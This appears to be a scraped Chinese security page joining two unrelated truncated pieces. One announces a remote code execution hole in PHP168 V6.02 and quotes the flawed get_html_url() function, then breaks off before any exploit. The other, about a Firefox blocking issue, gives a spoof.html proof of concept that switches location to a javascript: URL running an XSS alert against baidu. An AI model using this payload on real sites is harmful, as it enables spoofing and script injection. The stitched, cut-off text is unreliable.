PHP168 V6.02 整站系统远程执行任意代码漏洞 + 利用方法

time:2010-09-11 14:24 author:Luc1f3r blog:http://hi.baidu.com/luc1f3r from:http://hi.baidu.com/luc1f3r%5F/blog/item/265cabcafe57be0d93457e39.html     漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php: function get_html_url(){  global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;  $id=$aid;  if($page<1){   $page=1;  }  $postdb[posttime]=$rsdb[posttime];    if($showHtml_Type[bencandy][$id]){   $filename_b=$showHtml_Type[bencandy][$id];  }elseif($fidDB[bencandy_html]){   $filename_b=$fidDB[bencandy_html];  }else{   $filename_b=$webdb[bencandy_filename];  }  //对

火狐浏览器中的阻塞问题

    何等猎奇的老文章(2009-09-07 16:45),经典,值得学习。。。 代码一:spoof.html <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { location = "http://www.baidu.com"; location = "javascript:alert('xss baidu')"; } </script>     用